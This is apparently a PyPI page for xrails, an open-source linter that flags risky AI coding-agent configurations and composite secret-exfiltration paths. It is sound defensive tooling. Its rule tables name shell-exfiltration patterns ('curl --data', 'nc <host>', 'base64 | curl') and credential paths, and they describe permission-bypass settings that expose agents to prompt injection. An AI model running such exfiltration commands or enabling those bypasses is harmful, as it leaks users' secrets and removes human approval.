Open-source AI agent guardrails linter — Claude Code (incl. Skills), Codex CLI, OpenClaw, MCP

These details have not been verified by PyPI

Project links

Project description

xrails

Open-source AI agent guardrails linter. Find dangerous permissions, unsafe agent configs, risky skills, and cross-file attack paths before your AI agent runs.

xrails reads the configuration that drives Claude Code (including Skills), Codex CLI, OpenClaw, and MCP servers, normalizes it into a typed fact graph, evaluates 40 deterministic rules, and reports findings — including composite attack paths where individual settings look fine but combine into something dangerous.

pipx install xrails    # or: pip install xrails
xrails scan .

xrails scan — /repo
Profiles: claude-code · Grade: F (28/100) · Attack paths: 1
─────────────────────────────────────────────────────────────
[CRITICAL] XR-AP-EXFIL-001  High-confidence secret exfiltration path
  Secret-like file detected
    → Agent can read workspace files
    → Network egress enabled (WebFetch unscoped)
    → Approval prompts disabled (bypassPermissions)
    → Potential data exfiltration

[HIGH]  XR-CLAUDE-001  bypassPermissions mode enabled
  .claude/settings.json:2
  Why: skips approvals for nearly every tool action.
  Fix: set defaultMode to "default" or run inside an isolated container.

…
2 critical · 4 high · 1 medium · template-example: 0

Deterministic. Same input → same findings. No LLM in the pass/fail loop.
Facts-first. Rules query a typed fact graph, never raw config strings.
Multi-vendor. Claude Code, Codex CLI, OpenClaw, MCP, and Claude Code Skills (SKILL.md) — one CLI.
CI-ready. Stable JSON, SARIF 2.1.0, GitHub Action, suppressions, baselines.
Attack paths, not just lints. Source → capability → sink correlation finds the misconfigurations that only matter together.
Runs inside Claude Code. Slash command /xrails triages findings using the agent's own LLM — no extra API key needed.

Why this exists
Quick start
Example output
What xrails detects
Supported platforms
Skill scanning
LLM advisory review (opt-in)
Run inside Claude Code (no extra API key)
Privacy and data handling
Why facts, not regex
Attack-path example
GitHub Action
LLM explain mode (optional)
Suppressions and baselines
Authoring rules
How is this different from AgentShield?
Roadmap
Responsible disclosure
License

Why this exists

AI coding agents ship with broad permissions by default. A single setting — bypassPermissions, Bash(*), danger-full-access, an unpinned /var/run/docker.sock mount — can let prompt injection from a web page or a README turn into shell execution, secret exfiltration, or destructive git operations.

The risk usually isn't one bad setting. It's the combination: a secret file plus filesystem read plus an outbound channel plus a weak approval policy. Each looks fine alone. Together they're a complete exfiltration path.

xrails is a static analysis tool that finds both atomic misconfigurations and these composite paths, before the agent runs.

Quick start

# Install (pipx is preferred — keeps xrails out of your project venv)
pipx install xrails
# or:
pip install xrails

# Scan the current directory
xrails scan .

# Or aim it at a specific config dir
xrails scan ./examples/vulnerable/claude_code

# JSON for tooling, SARIF for GitHub code scanning
xrails scan . --format json   --output xrails.json
xrails scan . --format sarif  --output xrails.sarif

Try the demo configs that ship with the repo:

git clone https://github.com/xrails-ai/xrails
cd xrails

xrails scan examples/vulnerable/claude_code     # expect findings
xrails scan examples/secure/claude_code         # expect clean
xrails scan examples/vulnerable/attack-path-exfil   # expect XR-AP-EXFIL-001

Example output

A vulnerable Claude Code config:

xrails scan — examples/vulnerable/claude_code
Profiles: claude-code · Grade: F (10/100) · Attack paths: 1

[HIGH]     XR-AP-EXFIL-001  High-confidence secret exfiltration path
[HIGH]     XR-CLAUDE-001    bypassPermissions mode enabled
[HIGH]     XR-CLAUDE-002    Bash(*) allows unrestricted shell execution
[HIGH]     XR-CLAUDE-003    WebFetch allowed without domain scoping
[MEDIUM]   XR-CLAUDE-009    No deny rules for .env or credential files

5 findings (0 critical, 4 high, 1 medium, 0 low) · active-runtime: 5

Same scan as JSON:

xrails scan . --format json | jq '.score, .findings[].rule_id'

{ "numeric": 10, "grade": "F", "critical_count": 0, "high_count": 4, ... }
"XR-AP-EXFIL-001"
"XR-CLAUDE-001"
…

What xrails detects

40 rules across six profiles. Severity ladder: critical / high / medium / low / info.

Claude Code (10 rules)

Rule	Sev	What it detects
XR-CLAUDE-001	HIGH	`bypassPermissions` mode enabled
XR-CLAUDE-002	HIGH	`Bash(*)` wildcard with no deny for destructive commands
XR-CLAUDE-003	HIGH	`WebFetch` without domain scoping
XR-CLAUDE-004	MEDIUM	`additionalDirectories` includes home directory
XR-CLAUDE-005	MEDIUM	`CLAUDE.md` instructs the agent to skip permissions
XR-CLAUDE-006	HIGH	Command hooks run with full user permissions
XR-CLAUDE-007	HIGH	HTTP hooks send to remote URLs
XR-CLAUDE-008	MEDIUM	`allowedHttpHookUrls` unset while hooks enabled
XR-CLAUDE-009	MEDIUM	No deny rules for `.env` or credential files
XR-CLAUDE-010	MEDIUM	`auto` mode without managed org constraints

Codex (8 rules)

Rule	Sev	What it detects
XR-CODEX-001	HIGH	`sandbox_mode = "danger-full-access"`
XR-CODEX-002	HIGH	`approval_policy = "never"` in writable sandbox
XR-CODEX-003	HIGH	Network access enabled in workspace-write sandbox
XR-CODEX-004	MEDIUM	Project config present but possibly untrusted
XR-CODEX-005	HIGH	MCP servers without enterprise allowlist
XR-CODEX-006	HIGH	MCP tool approval overrides are permissive
XR-CODEX-007	MEDIUM	Shell environment policy too permissive
XR-CODEX-008	MEDIUM	`otel.log_user_prompt = true`

OpenClaw (7 rules)

Rule	Sev	What it detects
XR-OPENCLAW-001	HIGH	Sandboxing disabled — tools run on host
XR-OPENCLAW-002	HIGH	Workspace treated as boundary but sandbox off
XR-OPENCLAW-003	HIGH	Docker bind mount without `:ro`
XR-OPENCLAW-004	CRITICAL	`/var/run/docker.sock` bind mount
XR-OPENCLAW-005	MEDIUM	Broad tool groups in allow list
XR-OPENCLAW-006	MEDIUM	`sandbox.mode = non-main`
XR-OPENCLAW-007	MEDIUM	`.env` with secrets in agent workspace

MCP (2 rules)

Rule	Sev	What it detects
XR-MCP-001	HIGH	MCP server + weak approvals + network egress
XR-MCP-002	MEDIUM	Remote MCP transport without identity pinning

Skills (5 rules + 1 composite)

Rule	Sev	What it detects
XR-SKILL-001	HIGH	SKILL.md `allowed-tools` includes bare wildcards (`Bash`, `Read`, `WebFetch`)
XR-SKILL-002	HIGH	Skill body contains shell-exfil patterns (`curl --data`, `nc <host>`, `base64 \| curl`)
XR-SKILL-003	MEDIUM	Skill body references credential paths (`~/.aws`, `~/.ssh`, `.env`)
XR-SKILL-004	MEDIUM	Skill body uses approval-bypass language ("skip permissions", "dangerously")
XR-SKILL-005	MEDIUM	Third-party skill loaded from a plugin / vendored tree without pinning
XR-AP-SKILL-EXFIL-001	HIGH	Composite: one or more skills read secrets AND one or more emit network traffic

Composite attack paths (7 rules)

Rule	Sev	What it detects
XR-AP-EXFIL-001	HIGH	Secret + read + egress + bypass = exfiltration path
XR-AP-DESTRUCT-001	HIGH	Shell + bypass = destructive git ops
XR-AP-DRIFT-001	MEDIUM	Effective policy ≠ intended config
XR-AP-HOOK-EXFIL-001	HIGH	Hooks + unrestricted URLs + secrets
XR-AP-MCP-SUPPLYCHAIN-001	HIGH	MCP auto-install without version pinning
XR-AP-ADDDIR-BYPASS-001	HIGH	`bypassPermissions` + home dir in `additionalDirectories`
XR-AP-SANDBOX-DRIFT-001	HIGH	Sandbox configured but not effective

xrails rules list browses every installed rule with profile and severity filters; xrails rules validate checks the YAML catalog against the schema.

Supported platforms

Agent	Files xrails reads	Notes
Claude Code	`.claude/settings.json`, `.claude/settings.local.json`, `.mcp.json`, `CLAUDE.md`, `.claude/CLAUDE.md`	Permission rules, hooks, MCP servers, instruction files
Codex CLI	`.codex/config.toml`	Sandbox modes, approvals, MCP, telemetry
OpenClaw	`openclaw.json`	Sandbox, Docker binds, tool policy
MCP	Servers declared inside any of the above	Remote/local transport, approval overrides
Skills	`.claude/skills/*/SKILL.md`, plugin/vendored skills	Frontmatter `allowed-tools` + body heuristics (shell exfil, sensitive paths, bypass language)
All	`.env`, `.env.*`	Secret-like keys for attack-path correlation

Findings inside examples/, fixtures/, docs/, samples/, etc. are classified as template-example and scored at a discount, so a repo that ships demo configs won't produce misleading grades.

Skill scanning

xrails reads every SKILL.md under .claude/skills/, plugin trees, and vendored skill directories. Six rules detect:

broad allowed-tools (bare Bash, Read, WebFetch)
shell exfil patterns in the body (curl --data, nc <host>, base64 | curl)
references to credential paths (~/.aws, ~/.ssh, .env)
approval-bypass language ("skip permissions", "dangerously")
third-party skills loaded without version pinning
a composite path: skill reads secrets ∧ skill emits network traffic

xrails scan examples/vulnerable/risky-skill

Output (abridged):

[HIGH]   XR-AP-SKILL-EXFIL-001  Skill exfiltration path
[HIGH]   XR-SKILL-001           Skill declares broad allowed-tools
[HIGH]   XR-SKILL-002           Skill body contains shell exfil patterns
[MEDIUM] XR-SKILL-003           Skill body references sensitive paths
[MEDIUM] XR-SKILL-004           Skill body uses approval-bypass language

LLM advisory review (opt-in)

Run an LLM advisory pass against a SKILL.md or a directory of them:

# Default offline — no API key required
xrails review-skill ./.claude/skills

# Use a real provider
export OPENAI_API_KEY=sk-...
xrails review-skill ./.claude/skills --llm-provider openai

# Or Anthropic
export ANTHROPIC_API_KEY=sk-ant-...
xrails review-skill ./.claude/skills --llm-provider anthropic

This output is advisory, not a finding. It does not affect exit code, score, or SARIF, and is clearly labelled in the terminal. Skill body is redacted (secret-like keys, long opaque tokens) before any prompt is assembled. The deterministic scanner (xrails scan) remains the source of truth in CI.

Run inside Claude Code (no extra API key)

xrails ships a slash command and an auto-invoke skill for Claude Code:

xrails install-agent --scope project   # writes into ./.claude/
# or:
xrails install-agent --scope user      # writes into ~/.claude/

Then in Claude Code:

Type /xrails to run a triage on the current repo.
Or ask Claude "audit my agent setup" — the xrails-audit skill auto-invokes when context fits.

The integration uses Claude's own LLM for triage. xrails provides the deterministic findings (via xrails scan and xrails review-skill JSON output); Claude reasons over them with project context. No separate API-key configuration needed.

The slash command and skill both pin allowed-tools to Bash(xrails *), Bash(which xrails), and Read — Claude cannot run arbitrary shell or write files from this integration.

Privacy and data handling

xrails is built so the deterministic scan runs entirely on your machine.

Surface	Default behavior	Network calls?	Notes
`xrails scan`	Local	No	Reads files, evaluates rules, writes report.
`xrails review-skill`	`echo` provider (offline)	No	Heuristic pseudo-review from the parser.
`xrails review-skill --llm-provider openai/anthropic`	Opt-in	Yes	Body redacted before prompt.
`xrails explain --llm-provider openai/anthropic`	Opt-in	Yes	Evidence redacted before prompt.
`/xrails` slash command in Claude Code	Uses host LLM	Inherits Claude Code's network policy	xrails subprocess itself stays local.

Concrete guarantees, all enforced by tests:

xrails scan never imports openai, anthropic, or any HTTP client.
.env parsing stores only value_present: bool — raw secret values never reach reporters, logs, JSON, or SARIF.
Redaction (strip secret-like keys + long opaque tokens) runs on every byte of evidence before any LLM provider receives a prompt.
ReviewSuggestion is a separate type from Finding — it cannot enter exit code, score, SARIF, or --fail-on decisions.
Provider SDKs are imported lazily inside _get_client() and only when a non-echo provider is explicitly selected.

If any of these claims look wrong, please open a security issue per SECURITY.md.

Why facts, not regex

Most "AI security" linters are regex over config files. That breaks fast: JSON keys reorder, TOML tables nest, YAML aliases hide things. Worse, regex can't see combinations.

xrails parses each config file with a real parser (tomllib, json, PyYAML), normalizes the result into a typed FactGraph, and evaluates rules against facts. Two consequences:

Composite findings are first-class. A secret-bearing .env, a filesystem capability, a network capability, and a weak approval policy are four independent facts. The XR-AP-EXFIL rule fires only when all four coexist.
Rules become portable. New parsers add new facts; rules that query network.enabled == true or approval.policy == never work across vendors without rewriting.

The rule format is YAML — most rules are 20 lines and require no Python. See docs/rule-authoring.md.

Attack-path example

examples/vulnerable/attack-path-exfil/ ships a demo with four conditions that are individually plausible but together unsafe:

Source → Capability → Capability → Sink

[.env with API keys]
       ↓
[Read access (no .env deny)]
       ↓
[WebFetch unscoped → outbound HTTP]
       ↓
[bypassPermissions disables prompts]
       ↓
[Network exfiltration sink]

xrails scan examples/vulnerable/attack-path-exfil
# → XR-AP-EXFIL-001 fires + the underlying atomic findings.

GitHub Action

name: xrails
on: [pull_request, push]
jobs:
  xrails:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      security-events: write
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: "3.12"
      - run: pip install xrails
      - run: xrails scan . --format sarif --output xrails.sarif --fail-on high
      - if: always()
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: xrails.sarif
          category: xrails

Findings appear in the Security tab of the repository. Full guide and reusable action recipe: docs/github-action.md.

Run inside Claude Code (no extra API key)

xrails ships a slash command and a skill for Claude Code. Install once:

xrails install-agent --scope project   # writes into ./.claude/
# or:
xrails install-agent --scope user      # writes into ~/.claude/

Then in Claude Code:

Type /xrails to run a triage on the current repo.
Or ask Claude "audit my agent setup" — the xrails-audit skill auto-invokes when context fits.

LLM explain mode (optional)

xrails never uses an LLM to decide whether a finding is real. The optional explain command rewrites a single finding's evidence into prose:

xrails scan . --format json --output report.json
xrails explain --report report.json --id XR-CLAUDE-001 --llm-provider echo

echo is the default and runs entirely offline. openai and anthropic providers are loaded lazily and only used when explicitly requested. All evidence is run through a redactor that strips secret-like keys and long opaque tokens before any prompt is assembled.

Suppressions and baselines

Adopt xrails on a legacy repo without being blocked by pre-existing findings:

xrails scan . --format json --output .xrails-baseline.json
xrails scan . --baseline .xrails-baseline.json   # only NEW findings break the build

Suppress one specific finding for one specific path with audit metadata in .xrails-suppressions.yml:

suppressions:
  - rule_id: XR-CLAUDE-009
    path: examples/**
    reason: demo fixture for documentation
    expires: 2026-12-31

Suppressions carry a reason and an expiry. Expired suppressions stop applying automatically — no silently-stale ignore lists.

Authoring rules

A rule is a YAML file:

schema_version: "2.0"
id: XR-CODEX-001
title: sandbox_mode = danger-full-access
category: excessive_privilege
severity: high
confidence: high
profiles: [codex]
facts:
  all:
    - fact: sandbox.mode
      op: eq
      value: danger-full-access
remediation:
  steps:
    - Use sandbox_mode = "workspace-write" with approval_policy = "on-request".
  references:
    - title: Codex — Agent approvals & security
      url: https://developers.openai.com/codex/agent-approvals-security
cwe: [CWE-269 Improper Privilege Management]

Drop it into src/xrails/rules/<vendor>/, add trigger/safe fixtures under tests/fixtures/<vendor>/, run xrails rules validate and xrails rules test. No Python required for atomic rules.

Detailed walkthrough including operators (eq, contains, regex, matches_any, present, absent, gt/gte/lt/lte, in/not_in) and the fact catalog: docs/rule-authoring.md.

How is this different from AgentShield?

AgentShield is the closest existing tool and it's good — we share the underlying motivation that AI agent misconfigurations need real auditing. The differences are scope and architecture:

	AgentShield	xrails
Primary scope	Claude Code	Claude Code (incl. Skills), Codex CLI, OpenClaw, MCP
Engine model	Pattern + scoring	Typed fact graph + DSL evaluator
Composite findings	Implicit via scoring	First-class attack-path rules over a correlation graph
Rule format	Python	YAML DSL (Python only for graph rules)
LLM role	None	Optional, opt-in: `xrails explain`, `xrails review-skill`
Claude Code integration	—	`/xrails` slash command + `xrails-audit` skill
CI artifacts	JSON / SARIF	JSON, SARIF, GitHub Action, baseline, suppressions

We respect AgentShield's prior art — runtimeConfidence and the discovery-skip patterns are clearly inspired by it.

Roadmap

v0.3 (current, beta) — Skill scanning (SKILL.md), LLM advisory review (xrails review-skill), Claude Code slash command + skill (/xrails, xrails-audit), 40 rules, 312 tests.
v0.4 — additional vendors (Cline, Cursor agents, Aider), expanded MCP identity rules, OPA/Conftest export for org-level policy packs.
v0.5 — VS Code extension surfacing findings inline; public benchmark report pipeline; rule packs (xrails-rules-enterprise).

Responsible disclosure

Security issues: see SECURITY.md. Public benchmark scans follow the rules in benchmarks/README.md — no raw secrets, no live exploit chains, no naming projects with critical live exposures before private outreach.

License

Apache 2.0.

xrails is part of GuardrailsAI.

Project details

These details have not been verified by PyPI

Project links

Release history Release notifications | RSS feed

0.3.0

Apr 29, 2026

This version

0.3.0b2 pre-release

Apr 29, 2026

0.2.0

Apr 29, 2026

0.1.0

Apr 5, 2026

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

xrails-0.3.0b2.tar.gz (240.6 kB view details)

Uploaded Apr 29, 2026 Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

The dropdown lists show the available interpreters, ABIs, and platforms. Enable javascript to be able to filter the list of wheel files.

xrails-0.3.0b2-py3-none-any.whl (140.4 kB view details)

Uploaded Apr 29, 2026 Python 3

File details

Details for the file xrails-0.3.0b2.tar.gz.

File metadata

Download URL: xrails-0.3.0b2.tar.gz
Upload date: Apr 29, 2026
Size: 240.6 kB
Tags: Source
Uploaded using Trusted Publishing? No
Uploaded via: twine/6.2.0 CPython/3.12.3

File hashes

Hashes for xrails-0.3.0b2.tar.gz
Algorithm	Hash digest
SHA256	`4fc1e6e834cd5b706f7c06e2bd3402772b8676e24ae9b5b7f45a2bb78003e108`
MD5	`fa0054a89a1e78aa30f2ea117e067ab0`
BLAKE2b-256	`58655baba33294485cb8492a71d61ec9076cd5abc06b5d9cea09f78b3a44f094`

See more details on using hashes here.

File details

Details for the file xrails-0.3.0b2-py3-none-any.whl.

File metadata

Download URL: xrails-0.3.0b2-py3-none-any.whl
Upload date: Apr 29, 2026
Size: 140.4 kB
Tags: Python 3
Uploaded using Trusted Publishing? No
Uploaded via: twine/6.2.0 CPython/3.12.3

File hashes

Hashes for xrails-0.3.0b2-py3-none-any.whl
Algorithm	Hash digest
SHA256	`27d606ec6f1c0961c23ca1956c9233dd67c5a860936f141a0100c68786032254`
MD5	`495be445e68f143e64e003e6165240c6`
BLAKE2b-256	`0b29e693d40193d0a1245c3e015fe280fc3d8d4e3c7a2e14474641667557e17e`

See more details on using hashes here.

xrails 0.3.0b2

Navigation

Verified details

Maintainers

Unverified details

Project links

Meta

Classifiers

Project description

xrails

Table of contents

Why this exists

Quick start

Example output

What xrails detects

Supported platforms

Skill scanning

LLM advisory review (opt-in)

Run inside Claude Code (no extra API key)

Privacy and data handling

Why facts, not regex

Attack-path example

GitHub Action

Run inside Claude Code (no extra API key)

LLM explain mode (optional)

Suppressions and baselines

Authoring rules

How is this different from AgentShield?

Roadmap

Responsible disclosure

License

Project details

Verified details

Maintainers

Unverified details

Project links

Meta

Classifiers

Release history Release notifications | RSS feed

Download files

Source Distribution

Built Distribution

File details

File metadata

File hashes

File details

File metadata

File hashes